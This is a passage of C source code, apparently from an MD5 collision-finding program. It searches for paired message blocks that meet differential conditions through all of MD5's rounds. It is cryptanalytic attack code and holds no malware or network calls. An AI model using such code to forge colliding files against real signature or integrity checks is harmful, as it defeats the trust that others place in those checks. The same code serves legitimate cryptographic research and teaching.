F(s.Q1[13], s.Q1[12], s.Q1[11]) - s.Q1[10] - 0xfd987193; if(s.X0[13] != s.X1[13]) continue; /* C4 */ s.Q0[15] = (random() | 0x21008000) & ~0x82000008; s.Q1[15] = s.Q0[15] - 0x80007ff8; s.X0[14] = RR(s.Q0[15] - s.Q0[14], 17) - F(s.Q0[14], s.Q0[13], s.Q0[12]) - s.Q0[11] - 0xa679438e; s.X1[14] = RR(s.Q1[15] - s.Q1[14], 17) - F(s.Q1[14], s.Q1[13], s.Q1[12]) - s.Q1[11] - 0xa679438e; if((s.X0[14] ^ s.X1[14]) != 0x80000000) continue; /* B4 */ s.Q0[16] = (random() | 0x20000000) & ~0x80000000; s.Q1[16] = s.Q0[16] - 0xa0000000; s.X0[15] = RR(s.Q0[16] - s.Q0[15], 22) - F(s.Q0[15], s.Q0[14], s.Q0[13]) - s.Q0[12] - 0x49b40821; s.X1[15] = RR(s.Q1[16] - s.Q1[15], 22) - F(s.Q1[15], s.Q1[14], s.Q1[13]) - s.Q1[12] - 0x49b40821; if(s.X0[15] != s.X1[15]) continue; break; } for(i = 0; i < LOOP_11; i++) { /* A5 */ s.Q0[17] = random() & ~(0x80020000 | 0x00008008); s.Q0[17] |= (s.Q0[16] & 0x00008008); s.Q1[17] = s.Q0[17] - 0x80000000; s.X0[ 1] = RR(s.Q0[17] - s.Q0[16], 5) - G(s.Q0[16], s.Q0[15], s.Q0[14]) - s.Q0[13] - 0xf61e2562; s.X1[ 1] = RR(s.Q1[17] - s.Q1[16], 5) - G(s.Q1[16], s.Q1[15], s.Q1[14]) - s.Q1[13] - 0xf61e2562; if(s.X0[ 1] != s.X1[ 1]) continue; /* D5 */ s.Q0[18] = RL(G(s.Q0[17], s.Q0[16], s.Q0[15]) + s.Q0[14] + s.X0[ 6] + 0xc040b340, 9) + s.Q0[17]; if((s.Q0[18] & 0xa0020000) != (0x00020000 | (s.Q0[17] & 0x20000000))) { continue; } s.Q1[18] = RL(G(s.Q1[17], s.Q1[16], s.Q1[15]) + s.Q1[14] + s.X1[ 6] + 0xc040b340, 9) + s.Q1[17]; if((s.Q0[18] ^ s.Q1[18]) != 0x80000000) continue; /* C5 */ s.Q0[19] = RL(G(s.Q0[18], s.Q0[17], s.Q0[16]) + s.Q0[15] + s.X0[11] + 0x265e5a51, 14) + s.Q0[18]; if(s.Q0[19] & 0x80020000) continue; s.Q1[19] = RL(G(s.Q1[18], s.Q1[17], s.Q1[16]) + s.Q1[15] + s.X1[11] + 0x265e5a51, 14) + s.Q1[18]; if(s.Q0[19] - s.Q1[19] != 0x7ffe0000) continue; /* B5 */ s.Q0[20] = random() & ~0x80000000; s.Q1[20] = s.Q0[20] - 0x80000000; s.X0[ 0] = RR(s.Q0[20] - s.Q0[19], 20) - G(s.Q0[19], s.Q0[18], s.Q0[17]) - s.Q0[16] - 0xe9b6c7aa; s.X1[ 0] = RR(s.Q1[20] - s.Q1[19], 20) - G(s.Q1[19], s.Q1[18], s.Q1[17]) - s.Q1[16] - 0xe9b6c7aa; if(s.X0[ 0] != s.X1[ 0]) continue; s.Q0[ 1] = RL(F(IV[1], IV[2], IV[3]) + IV[0] + s.X0[ 0] + 0xd76aa478, 7) + IV[1]; s.Q1[ 1] = s.Q0[ 1]; s.Q0[ 2] = RL(F(s.Q0[ 1], IV[1], IV[2]) + IV[3] + s.X0[ 1] + 0xe8c7b756, 12) + s.Q0[ 1]; s.Q1[ 2] = s.Q0[ 2]; s.X0[ 2] = RR(s.Q0[ 3] - s.Q0[ 2], 17) - F(s.Q0[ 2], s.Q0[ 1], IV[1]) - IV[2] - 0x242070db; s.X1[ 2] = s.X0[ 2]; s.X0[ 3] = RR(s.Q0[ 4] - s.Q0[ 3], 22) - F(s.Q0[ 3], s.Q0[ 2], s.Q0[ 1]) - IV[1] - 0xc1bdceee; s.X1[ 3] = s.X0[ 3]; s.X0[ 4] = RR(s.Q0[ 5] - s.Q0[ 4], 7) - F(s.Q0[ 4], s.Q0[ 3], s.Q0[ 2]) - s.Q0[ 1] - 0xf57c0faf; s.X1[ 4] = RR(s.Q1[ 5] - s.Q1[ 4], 7) - F(s.Q1[ 4], s.Q1[ 3], s.Q1[ 2]) - s.Q1[ 1] - 0xf57c0faf; if((s.X0[ 4] ^ s.X1[ 4]) != 0x80000000) continue; s.X0[ 5] = RR(s.Q0[ 6] - s.Q0[ 5], 12) - F(s.Q0[ 5], s.Q0[ 4], s.Q0[ 3]) - s.Q0[ 2] - 0x4787c62a; s.X1[ 5] = RR(s.Q1[ 6] - s.Q1[ 5], 12) - F(s.Q1[ 5], s.Q1[ 4], s.Q1[ 3]) - s.Q1[ 2] - 0x4787c62a; if(s.X0[ 5] != s.X1[ 5]) continue; /* A6 */ s.Q0[21] = RL(G(s.Q0[20], s.Q0[19], s.Q0[18]) + s.Q0[17] + s.X0[ 5] + 0xd62f105d, 5) + s.Q0[20]; if((s.Q0[21] & 0x80020000) != (s.Q0[20] & 0x00020000)) continue; s.Q1[21] = RL(G(s.Q1[20], s.Q1[19], s.Q1[18]) + s.Q1[17] + s.X1[ 5] + 0xd62f105d, 5) + s.Q1[20]; if((s.Q0[21] ^ s.Q1[21]) != 0x80000000) continue; /* D6 */ s.Q0[22] = RL(G(s.Q0[21], s.Q0[20], s.Q0[19]) + s.Q0[18] + s.X0[10] + 0x02441453, 9) + s.Q0[21]; if(s.Q0[22] & 0x80000000) continue; s.Q1[22] = RL(G(s.Q1[21], s.Q1[20], s.Q1[19]) + s.Q1[18] + s.X1[10] + 0x02441453, 9) + s.Q1[21]; if((s.Q0[22] ^ s.Q1[22]) != 0x80000000) continue; /* C6 */ s.Q0[23] = RL(G(s.Q0[22], s.Q0[21], s.Q0[20]) + s.Q0[19] + s.X0[15] + 0xd8a1e681, 14) + s.Q0[22]; if(s.Q0[23] & 0x80000000) continue; s.Q1[23] = RL(G(s.Q1[22], s.Q1[21], s.Q1[20]) + s.Q1[19] + s.X1[15] + 0xd8a1e681, 14) + s.Q1[22]; if(s.Q0[23] != s.Q1[23]) continue; /* B6 */ s.Q0[24] = RL(G(s.Q0[23], s.Q0[22], s.Q0[21]) + s.Q0[20] + s.X0[ 4] + 0xe7d3fbc8, 20) + s.Q0[23]; s.Q1[24] = RL(G(s.Q1[23], s.Q1[22], s.Q1[21]) + s.Q1[20] + s.X1[ 4] + 0xe7d3fbc8, 20) + s.Q1[23]; if(s.Q0[24] != s.Q1[24]) continue; /* A7 */ s.Q0[25] = RL(G(s.Q0[24], s.Q0[23], s.Q0[22]) + s.Q0[21] + s.X0[ 9] + 0x21e1cde6, 5) + s.Q0[24]; s.Q1[25] = RL(G(s.Q1[24], s.Q1[23], s.Q1[22]) + s.Q1[21] + s.X1[ 9] + 0x21e1cde6, 5) + s.Q1[24]; if(s.Q0[25] != s.Q1[25]) continue; /* D7 */ s.Q0[26] = RL(G(s.Q0[25], s.Q0[24], s.Q0[23]) + s.Q0[22] + s.X0[14] + 0xc33707d6, 9) + s.Q0[25]; s.Q1[26] = RL(G(s.Q1[25], s.Q1[24], s.Q1[23]) + s.Q1[22] + s.X1[14] + 0xc33707d6, 9) + s.Q1[25]; if(s.Q0[26] != s.Q1[26]) continue; /* C7 */ s.Q0[27] = RL(G(s.Q0[26], s.Q0[25], s.Q0[24]) + s.Q0[23] + s.X0[ 3] + 0xf4d50d87, 14) + s.Q0[26]; s.Q1[27] = RL(G(s.Q1[26], s.Q1[25], s.Q1[24]) + s.Q1[23] + s.X1[ 3] + 0xf4d50d87, 14) + s.Q1[26]; if(s.Q0[27] != s.Q1[27]) continue; break; } if(i >= LOOP_11) goto block1_again; ct1++; for(i = 0; i < LOOP_12; i++) { if (cb) { if ((i & 0xfffff) == 0) { if (callback2(cb, ct1, i>>20)) { return 1; } } } /* B5 */ s.Q0[20] ^= (1 << (random() % 31)); s.Q1[20] = s.Q0[20] - 0x80000000; s.X0[ 0] = RR(s.Q0[20] - s.Q0[19], 20) - G(s.Q0[19], s.Q0[18], s.Q0[17]) - s.Q0[16] - 0xe9b6c7aa; s.X1[ 0] = RR(s.Q1[20] - s.Q1[19], 20) - G(s.Q1[19], s.Q1[18], s.Q1[17]) - s.Q1[16] - 0xe9b6c7aa; if(s.X0[ 0] != s.X1[ 0]) continue; s.Q0[ 1] = RL(F(IV[1], IV[2], IV[3]) + IV[0] + s.X0[ 0] + 0xd76aa478, 7) + IV[1]; s.Q1[ 1] = s.Q0[ 1]; s.Q0[ 2] = RL(F(s.Q0[ 1], IV[1], IV[2]) + IV[3] + s.X0[ 1] + 0xe8c7b756, 12) + s.Q0[ 1]; s.Q1[ 2] = s.Q0[ 2]; s.X0[ 2] = RR(s.Q0[ 3] - s.Q0[ 2], 17) - F(s.Q0[ 2], s.Q0[ 1], IV[1]) - IV[2] - 0x242070db; s.X1[ 2] = s.X0[ 2]; s.X0[ 3] = RR(s.Q0[ 4] - s.Q0[ 3], 22) - F(s.Q0[ 3], s.Q0[ 2], s.Q0[ 1]) - IV[1] - 0xc1bdceee; s.X1[ 3] = s.X0[ 3]; s.X0[ 4] = RR(s.Q0[ 5] - s.Q0[ 4], 7) - F(s.Q0[ 4], s.Q0[ 3], s.Q0[ 2]) - s.Q0[ 1] - 0xf57c0faf; s.X1[ 4] = RR(s.Q1[ 5] - s.Q1[ 4], 7) - F(s.Q1[ 4], s.Q1[ 3], s.Q1[ 2]) - s.Q1[ 1] - 0xf57c0faf; if((s.X0[ 4] ^ s.X1[ 4]) != 0x80000000) continue; s.X0[ 5] = RR(s.Q0[ 6] - s.Q0[ 5], 12) - F(s.Q0[ 5], s.Q0[ 4], s.Q0[ 3]) - s.Q0[ 2] - 0x4787c62a; s.X1[ 5] = RR(s.Q1[ 6] - s.Q1[ 5], 12) - F(s.Q1[ 5], s.Q1[ 4], s.Q1[ 3]) - s.Q1[ 2] - 0x4787c62a; if(s.X0[ 5] != s.X1[ 5]) continue; /* A6 */ s.Q0[21] = RL(G(s.Q0[20], s.Q0[19], s.Q0[18]) + s.Q0[17] + s.X0[ 5] + 0xd62f105d, 5) + s.Q0[20]; if((s.Q0[21] & 0x80020000) != (s.Q0[20] & 0x00020000)) continue; s.Q1[21] = RL(G(s.Q1[20], s.Q1[19], s.Q1[18]) + s.Q1[17] + s.X1[ 5] + 0xd62f105d, 5) + s.Q1[20]; if((s.Q0[21] ^ s.Q1[21]) != 0x80000000) continue; /* D6 */ s.Q0[22] = RL(G(s.Q0[21], s.Q0[20], s.Q0[19]) + s.Q0[18] + s.X0[10] + 0x02441453, 9) + s.Q0[21]; if(s.Q0[22] & 0x80000000) continue; s.Q1[22] = RL(G(s.Q1[21], s.Q1[20], s.Q1[19]) + s.Q1[18] + s.X1[10] + 0x02441453, 9) + s.Q1[21]; if((s.Q0[22] ^ s.Q1[22]) != 0x80000000) continue; /* C6 */ s.Q0[23] = RL(G(s.Q0[22], s.Q0[21], s.Q0[20]) + s.Q0[19] + s.X0[15] + 0xd8a1e681, 14) + s.Q0[22]; if(s.Q0[23] & 0x80000000) continue; s.Q1[23] = RL(G(s.Q1[22], s.Q1[21], s.Q1[20]) + s.Q1[19] + s.X1[15] + 0xd8a1e681, 14) + s.Q1[22]; if(s.Q0[23] != s.Q1[23]) continue; /* B6 */ s.Q0[24] = RL(G(s.Q0[23], s.Q0[22], s.Q0[21]) + s.Q0[20] + s.X0[ 4] + 0xe7d3fbc8, 20) + s.Q0[23]; s.Q1[24] = RL(G(s.Q1[23], s.Q1[22], s.Q1[21]) + s.Q1[20] + s.X1[ 4] + 0xe7d3fbc8, 20) + s.Q1[23]; if(s.Q0[24] != s.Q1[24]) continue; /* A7 */ s.Q0[25] = RL(G(s.Q0[24], s.Q0[23], s.Q0[22]) + s.Q0[21] + s.X0[ 9] + 0x21e1cde6, 5) + s.Q0[24]; s.Q1[25] = RL(G(s.Q1[24], s.Q1[23], s.Q1[22]) + s.Q1[21] + s.X1[ 9] + 0x21e1cde6, 5) + s.Q1[24]; if(s.Q0[25] != s.Q1[25]) continue; /* D7 */ s.Q0[26] = RL(G(s.Q0[25], s.Q0[24], s.Q0[23]) + s.Q0[22] + s.X0[14] + 0xc33707d6, 9) + s.Q0[25]; s.Q1[26] = RL(G(s.Q1[25], s.Q1[24], s.Q1[23]) + s.Q1[22] + s.X1[14] + 0xc33707d6, 9) + s.Q1[25]; if(s.Q0[26] != s.Q1[26]) continue; /* C7 */ s.Q0[27] = RL(G(s.Q0[26], s.Q0[25], s.Q0[24]) + s.Q0[23] + s.X0[ 3] + 0xf4d50d87, 14) + s.Q0[26]; s.Q1[27] = RL(G(s.Q1[26], s.Q1[25], s.Q1[24]) + s.Q1[23] + s.X1[ 3] + 0xf4d50d87, 14) + s.Q1[26]; if(s.Q0[27] != s.Q1[27]) continue; /* B7 */ s.Q0[28] = RL(G(s.Q0[27], s.Q0[26], s.Q0[25]) + s.Q0[24] + s.X0[ 8] + 0x455a14ed, 20) + s.Q0[27]; s.Q1[28] = RL(G(s.Q1[27], s.Q1[26], s.Q1[25]) + s.Q1[24] + s.X1[ 8] + 0x455a14ed, 20) + s.Q1[27]; if(s.Q0[28] != s.Q1[28]) continue; /* A8 */ s.Q0[29] = RL(G(s.Q0[28], s.Q0[27], s.Q0[26]) + s.Q0[25] + s.X0[13] + 0xa9e3e905, 5) + s.Q0[28]; s.Q1[29] = RL(G(s.Q1[28], s.Q1[27], s.Q1[26]) + s.Q1[25] + s.X1[13] + 0xa9e3e905, 5) + s.Q1[28]; if(s.Q0[29] != s.Q1[29]) continue; /* D8 */ s.Q0[30] = RL(G(s.Q0[29], s.Q0[28], s.Q0[27]) + s.Q0[26] + s.X0[ 2] + 0xfcefa3f8, 9) + s.Q0[29]; s.Q1[30] = RL(G(s.Q1[29], s.Q1[28], s.Q1[27]) + s.Q1[26] + s.X1[ 2] + 0xfcefa3f8, 9) + s.Q1[29]; if(s.Q0[30] != s.Q1[30]) continue; /* C8 */ s.Q0[31] = RL(G(s.Q0[30], s.Q0[29], s.Q0[28]) + s.Q0[27] + s.X0[ 7] + 0x676f02d9, 14) + s.Q0[30]; s.Q1[31] = RL(G(s.Q1[30], s.Q1[29], s.Q1[28]) + s.Q1[27] + s.X1[ 7] + 0x676f02d9, 14) + s.Q1[30]; if(s.Q0[31] != s.Q1[31]) continue; /* B8 */ s.Q0[32] = RL(G(s.Q0[31], s.Q0[30], s.Q0[29]) + s.Q0[28] + s.X0[12] + 0x8d2a4c8a, 20) + s.Q0[31]; s.Q1[32] = RL(G(s.Q1[31], s.Q1[30], s.Q1[29]) + s.Q1[28] + s.X1[12] + 0x8d2a4c8a, 20) + s.Q1[31]; if(s.Q0[32] != s.Q1[32]) continue; /* A9 */ s.Q0[33] = RL(H(s.Q0[32], s.Q0[31], s.Q0[30]) + s.Q0[29] + s.X0[ 5] + 0xfffa3942, 4) + s.Q0[32]; s.Q1[33] = RL(H(s.Q1[32], s.Q1[31], s.Q1[30]) + s.Q1[29] + s.X1[ 5] + 0xfffa3942, 4) + s.Q1[32]; if(s.Q0[33] != s.Q1[33]) continue; /* D9 */ s.Q0[34] = RL(H(s.Q0[33], s.Q0[32], s.Q0[31]) + s.Q0[30] + s.X0[ 8] + 0x8771f681, 11) + s.Q0[33]; s.Q1[34] = RL(H(s.Q1[33], s.Q1[32], s.Q1[31]) + s.Q1[30] + s.X1[ 8] + 0x8771f681, 11) + s.Q1[33]; if(s.Q0[34] != s.Q1[34]) continue; /* C9 */ s.Q0[35] = RL(H(s.Q0[34], s.Q0[33], s.Q0[32]) + s.Q0[31] + s.X0[11] + 0x6d9d6122, 16) + s.Q0[34]; s.Q1[35] = RL(H(s.Q1[34], s.Q1[33], s.Q1[32]) + s.Q1[31] + s.X1[11] + 0x6d9d6122, 16) + s.Q1[34]; if((s.Q0[35] ^ s.Q1[35]) != 0x80000000) continue; /* B9 */ s.Q0[36] = RL(H(s.Q0[35], s.Q0[34], s.Q0[33]) + s.Q0[32] + s.X0[14] + 0xfde5380c, 23) + s.Q0[35]; s.Q1[36] = RL(H(s.Q1[35], s.Q1[34], s.Q1[33]) + s.Q1[32] + s.X1[14] + 0xfde5380c, 23) + s.Q1[35]; if((s.Q0[36] ^ s.Q1[36]) != 0x80000000) continue; /* A10 */ s.Q0[37] = RL(H(s.Q0[36], s.Q0[35], s.Q0[34]) + s.Q0[33] + s.X0[ 1] + 0xa4beea44, 4) + s.Q0[36]; s.Q1[37] = RL(H(s.Q1[36], s.Q1[35], s.Q1[34]) + s.Q1[33] + s.X1[ 1] + 0xa4beea44, 4) + s.Q1[36]; if((s.Q0[37] ^ s.Q1[37]) != 0x80000000) continue; /* D10 */ s.Q0[38] = RL(H(s.Q0[37], s.Q0[36], s.Q0[35]) + s.Q0[34] + s.X0[ 4] + 0x4bdecfa9, 11) + s.Q0[37]; s.Q1[38] = RL(H(s.Q1[37], s.Q1[36], s.Q1[35]) + s.Q1[34] + s.X1[ 4] + 0x4bdecfa9, 11) + s.Q1[37]; if((s.Q0[38] ^ s.Q1[38]) != 0x80000000) continue; /* C10 */ s.Q0[39] = RL(H(s.Q0[38], s.Q0[37], s.Q0[36]) + s.Q0[35] + s.X0[ 7] + 0xf6bb4b60, 16) + s.Q0[38]; s.Q1[39] = RL(H(s.Q1[38], s.Q1[37], s.Q1[36]) + s.Q1[35] + s.X1[ 7] + 0xf6bb4b60, 16) + s.Q1[38]; if((s.Q0[39] ^ s.Q1[39]) != 0x80000000) continue; /* B10 */ s.Q0[40] = RL(H(s.Q0[39], s.Q0[38], s.Q0[37]) + s.Q0[36] + s.X0[10] + 0xbebfbc70, 23) + s.Q0[39]; s.Q1[40] = RL(H(s.Q1[39], s.Q1[38], s.Q1[37]) + s.Q1[36] + s.X1[10] + 0xbebfbc70, 23) + s.Q1[39]; if((s.Q0[40] ^ s.Q1[40]) != 0x80000000) continue; /* A11 */ s.Q0[41] = RL(H(s.Q0[40], s.Q0[39], s.Q0[38]) + s.Q0[37] + s.X0[13] + 0x289b7ec6, 4) + s.Q0[40]; s.Q1[41] = RL(H(s.Q1[40], s.Q1[39], s.Q1[38]) + s.Q1[37] + s.X1[13] + 0x289b7ec6, 4) + s.Q1[40]; if((s.Q0[41] ^ s.Q1[41]) != 0x80000000) continue; /* D11 */ s.Q0[42] = RL(H(s.Q0[41], s.Q0[40], s.Q0[39]) + s.Q0[38] + s.X0[ 0] + 0xeaa127fa, 11) + s.Q0[41]; s.Q1[42] = RL(H(s.Q1[41], s.Q1[40], s.Q1[39]) + s.Q1[38] + s.X1[ 0] + 0xeaa127fa, 11) + s.Q1[41]; if((s.Q0[42] ^ s.Q1[42]) != 0x80000000) continue; /* C11 */ s.Q0[43] = RL(H(s.Q0[42], s.Q0[41], s.Q0[40]) + s.Q0[39] + s.X0[ 3] + 0xd4ef3085, 16) + s.Q0[42]; s.Q1[43] = RL(H(s.Q1[42], s.Q1[41], s.Q1[40]) + s.Q1[39] + s.X1[ 3] + 0xd4ef3085, 16) + s.Q1[42]; if((s.Q0[43] ^ s.Q1[43]) != 0x80000000) continue; /* B11 */ s.Q0[44] = RL(H(s.Q0[43], s.Q0[42], s.Q0[41]) + s.Q0[40] + s.X0[ 6] + 0x04881d05, 23) + s.Q0[43]; s.Q1[44] = RL(H(s.Q1[43], s.Q1[42], s.Q1[41]) + s.Q1[40] + s.X1[ 6] + 0x04881d05, 23) + s.Q1[43]; if((s.Q0[44] ^ s.Q1[44]) != 0x80000000) continue; /* A12 */ s.Q0[45] = RL(H(s.Q0[44], s.Q0[43], s.Q0[42]) + s.Q0[41] + s.X0[ 9] + 0xd9d4d039, 4) + s.Q0[44]; s.Q1[45] = RL(H(s.Q1[44], s.Q1[43], s.Q1[42]) + s.Q1[41] + s.X1[ 9] + 0xd9d4d039, 4) + s.Q1[44]; if((s.Q0[45] ^ s.Q1[45]) != 0x80000000) continue; /* D12 */ s.Q0[46] = RL(H(s.Q0[45], s.Q0[44], s.Q0[43]) + s.Q0[42] + s.X0[12] + 0xe6db99e5, 11) + s.Q0[45]; s.Q1[46] = RL(H(s.Q1[45], s.Q1[44], s.Q1[43]) + s.Q1[42] + s.X1[12] + 0xe6db99e5, 11) + s.Q1[45]; if((s.Q0[46] ^ s.Q1[46]) != 0x80000000) continue; /* C12 */ s.Q0[47] = RL(H(s.Q0[46], s.Q0[45], s.Q0[44]) + s.Q0[43] + s.X0[15] + 0x1fa27cf8, 16) + s.Q0[46]; s.Q1[47] = RL(H(s.Q1[46], s.Q1[45], s.Q1[44]) + s.Q1[43] + s.X1[15] + 0x1fa27cf8, 16) + s.Q1[46]; if((s.Q0[47] ^ s.Q1[47]) != 0x80000000) continue; /* B12 */ s.Q0[48] = RL(H(s.Q0[47], s.Q0[46], s.Q0[45]) + s.Q0[44] + s.X0[ 2] + 0xc4ac5665, 23) + s.Q0[47]; if((s.Q0[48] ^ s.Q0[46]) & 0x80000000) continue; s.Q1[48] = RL(H(s.Q1[47], s.Q1[46], s.Q1[45]) + s.Q1[44] + s.X1[ 2] + 0xc4ac5665, 23) + s.Q1[47]; if((s.Q0[48] ^ s.Q1[48]) != 0x80000000) continue; /* A13 */ s.Q0[49] = RL(I(s.Q0[48], s.Q0[47], s.Q0[46]) + s.Q0[45] + s.X0[ 0] + 0xf4292244, 6) + s.Q0[48]; if((s.Q0[49] ^ s.Q0[47]) & 0x80000000) continue; s.Q1[49] = RL(I(s.Q1[48], s.Q1[47], s.Q1[46]) + s.Q1[45] + s.X1[ 0] + 0xf4292244, 6) + s.Q1[48]; if((s.Q0[49] ^ s.Q1[49]) != 0x80000000) continue; /* D13 */ s.Q0[50] = RL(I(s.Q0[49], s.Q0[48], s.Q0[47]) + s.Q0[46] + s.X0[ 7] + 0x432aff97, 10) + s.Q0[49]; if(!((s.Q0[50] ^ s.Q0[48]) & 0x80000000)) continue; s.Q1[50] = RL(I(s.Q1[49], s.Q1[48], s.Q1[47]) + s.Q1[46] + s.X1[ 7] + 0x432aff97, 10) + s.Q1[49]; if((s.Q0[50] ^ s.Q1[50]) != 0x80000000) continue; /* C13 */ s.Q0[51] = RL(I(s.Q0[50], s.Q0[49], s.Q0[48]) + s.Q0[47] + s.X0[14] + 0xab9423a7, 15) + s.Q0[50]; if((s.Q0[51] ^ s.Q0[49]) & 0x80000000) continue; s.Q1[51] = RL(I(s.Q1[50], s.Q1[49], s.Q1[48]) + s.Q1[47] + s.X1[14] + 0xab9423a7, 15) + s.Q1[50]; if((s.Q0[51] ^ s.Q1[51]) != 0x80000000) continue; /* B13 */ s.Q0[52] = RL(I(s.Q0[51], s.Q0[50], s.Q0[49]) + s.Q0[48] + s.X0[ 5] + 0xfc93a039, 21) + s.Q0[51]; if((s.Q0[52] ^ s.Q0[50]) & 0x80000000) continue; s.Q1[52] = RL(I(s.Q1[51], s.Q1[50], s.Q1[49]) + s.Q1[48] + s.X1[ 5] + 0xfc93a039, 21) + s.Q1[51]; if((s.Q0[52] ^ s.Q1[52]) != 0x80000000) continue; /* A14 */ s.Q0[53] = RL(I(s.Q0[52], s.Q0[51], s.Q0[50]) + s.Q0[49] + s.X0[12] + 0x655b59c3, 6) + s.Q0[52]; if((s.Q0[53] ^ s.Q0[51]) & 0x80000000) continue; s.Q1[53] = RL(I(s.Q1[52], s.Q1[51], s.Q1[50]) + s.Q1[49] + s.X1[12] + 0x655b59c3, 6) + s.Q1[52]; if((s.Q0[53] ^ s.Q1[53]) != 0x80000000) continue; /* D14 */ s.Q0[54] = RL(I(s.Q0[53], s.Q0[52], s.Q0[51]) + s.Q0[50] + s.X0[ 3] + 0x8f0ccc92, 10) + s.Q0[53]; if((s.Q0[54] ^ s.Q0[52]) & 0x80000000) continue; s.Q1[54] = RL(I(s.Q1[53], s.Q1[52], s.Q1[51]) + s.Q1[50] + s.X1[ 3] + 0x8f0ccc92, 10) + s.Q1[53]; if((s.Q0[54] ^ s.Q1[54]) != 0x80000000) continue; /* C14 */ s.Q0[55] = RL(I(s.Q0[54], s.Q0[53], s.Q0[52]) + s.Q0[51] + s.X0[10] + 0xffeff47d, 15) + s.Q0[54]; if((s.Q0[55] ^ s.Q0[53]) & 0x80000000) continue; s.Q1[55] = RL(I(s.Q1[54], s.Q1[53], s.Q1[52]) + s.Q1[51] + s.X1[10] + 0xffeff47d, 15) + s.Q1[54]; if((s.Q0[55] ^ s.Q1[55]) != 0x80000000) continue; /* B14 */ s.Q0[56] = RL(I(s.Q0[55], s.Q0[54], s.Q0[53]) + s.Q0[52] + s.X0[ 1] + 0x85845dd1, 21) + s.Q0[55]; if((s.Q0[56] ^ s.Q0[54]) & 0x80000000) continue; s.Q1[56] = RL(I(s.Q1[55], s.Q1[54], s.Q1[53]) + s.Q1[52] + s.X1[ 1] + 0x85845dd1, 21) + s.Q1[55]; if((s.Q0[56] ^ s.Q1[56]) != 0x80000000) continue; /* A15 */ s.Q0[57] = RL(I(s.Q0[56], s.Q0[55], s.Q0[54]) + s.Q0[53] + s.X0[ 8] + 0x6fa87e4f, 6) + s.Q0[56]; if((s.Q0[57] ^ s.Q0[55]) & 0x80000000) continue; s.Q1[57] = RL(I(s.Q1[56], s.Q1[55], s.Q1[54]) + s.Q1[53] + s.X1[ 8] + 0x6fa87e4f, 6) + s.Q1[56]; if((s.Q0[57] ^ s.Q1[57]) != 0x80000000) continue; /* D15 */ s.Q0[58] = RL(I(s.Q0[57], s.Q0[56], s.Q0[55]) + s.Q0[54] + s.X0[15] + 0xfe2ce6e0, 10) + s.Q0[57]; if((s.Q0[58] ^ s.Q0[56]) & 0x80000000) continue; s.Q1[58] = RL(I(s.Q1[57], s.Q1[56], s.Q1[55]) + s.Q1[54] + s.X1[15] + 0xfe2ce6e0, 10) + s.Q1[57]; if((s.Q0[58] ^ s.Q1[58]) != 0x80000000) continue; /* C15 */ s.Q0[59] = RL(I(s.Q0[58], s.Q0[57], s.Q0[56]) + s.Q0[55] + s.X0[ 6] + 0xa3014314, 15) + s.Q0[58]; if((s.Q0[59] ^ s.Q0[57]) & 0x80000000) continue; s.Q1[59] = RL(I(s.Q1[58], s.Q1[57], s.Q1[56]) + s.Q1[55] + s.X1[ 6] + 0xa3014314, 15) + s.Q1[58]; if((s.Q0[59] ^ s.Q1[59]) != 0x80000000) continue; /* B15 */ s.Q0[60] = RL(I(s.Q0[59], s.Q0[58], s.Q0[57]) + s.Q0[56] + s.X0[13] + 0x4e0811a1, 21) + s.Q0[59]; if(s.Q0[60] & 0x02000000) continue; s.Q1[60] = RL(I(s.Q1[59], s.Q1[58], s.Q1[57]) + s.Q1[56] + s.X1[13] + 0x4e0811a1, 21) + s.Q1[59]; if((s.Q0[60] ^ s.Q1[60]) != 0x80000000) continue; /* A16 */ s.Q0[61] = RL(I(s.Q0[60], s.Q0[59], s.Q0[58]) + s.Q0[57] + s.X0[ 4] + 0xf7537e82, 6) + s.Q0[60]; s.A0 = IV[0] + s.Q0[61]; s.Q1[61] = RL(I(s.Q1[60], s.Q1[59], s.Q1[58]) + s.Q1[57] + s.X1[ 4] + 0xf7537e82, 6) + s.Q1[60]; s.A1 = IV[0] + s.Q1[61]; if((s.A0 ^ s.A1) != 0x80000000) continue; /* D16 */ s.Q0[62] = RL(I(s.Q0[61], s.Q0[60], s.Q0[59]) + s.Q0[58] + s.X0[11] + 0xbd3af235, 10) + s.Q0[61]; s.D0 = IV[3] + s.Q0[62]; if(s.D0 & 0x02000000) continue; s.Q1[62] = RL(I(s.Q1[61], s.Q1[60], s.Q1[59]) + s.Q1[58] + s.X1[11] + 0xbd3af235, 10) + s.Q1[61]; s.D1 = IV[3] + s.Q1[62]; if((s.D0 - s.D1) != 0x7e000000) continue; /* C16 */ s.Q0[63] = RL(I(s.Q0[62], s.Q0[61], s.Q0[60]) + s.Q0[59] + s.X0[ 2] + 0x2ad7d2bb, 15) + s.Q0[62]; s.C0 = IV[2] + s.Q0[63]; if((s.C0 & 0x86000000) != ((s.D0 & 0x80000000) | 0x02000000)) continue; s.Q1[63] = RL(I(s.Q1[62], s.Q1[61], s.Q1[60]) + s.Q1[59] + s.X1[ 2] + 0x2ad7d2bb, 15) + s.Q1[62]; s.C1 = IV[2] + s.Q1[63]; if((s.C0 - s.C1) != 0x7e000000) continue; /* B16 */ s.Q0[64] = RL(I(s.Q0[63], s.Q0[62], s.Q0[61]) + s.Q0[60] + s.X0[ 9] + 0xeb86d391, 21) + s.Q0[63]; s.B0 = IV[1] + s.Q0[64]; if((s.B0 & 0x86000020) != (s.C0 & 0x80000000)) continue; s.Q1[64] = RL(I(s.Q1[63], s.Q1[62], s.Q1[61]) + s.Q1[60] + s.X1[ 9] + 0xeb86d391, 21) + s.Q1[63]; s.B1 = IV[1] + s.Q1[64]; if((s.B0 - s.B1) != 0x7e000000) continue; break; } if(i >= LOOP_12) goto block1_again; s.ct1 = ct1; s.ct2 = i>>20; return 0; } const unsigned int mask22[30] = { 0x00000001, 0x00000002, 0x00000004, 0x00000008, 0x00000010, 0x00000020, 0x00000040, 0x00000080, 0x00000100, 0x00000200, 0x00000400, 0x00000800, 0x00001000, 0x00002000, 0x00004000, 0x00008000, 0x00010000, 0x00020000, 0x00040000, 0x00080000, 0x00100000, 0x00200000, 0x00400000, 0x00800000, 0x01000000, 0x02000000, 0x04000000, 0x08000000, 0x10000000, 0x40000000 }; /* return 0 on success, 1 if interrupt requested. Returns -1 on failure, which means re-run block1(). */ int block2(callback_t *cb) { int i; int ct3 = 0; int it = 0; block2_again: for(;;) { /* A1 */ s.Q0[ 1] = (random() | 0x84200000) & ~0x0a000820; s.Q1[ 1] = s.Q0[ 1] - 0x7e000000; s.X0[16] = RR(s.Q0[ 1] - s.B0, 7) - F(s.B0, s.C0, s.D0) - s.A0 - 0xd76aa478; s.X1[16] = 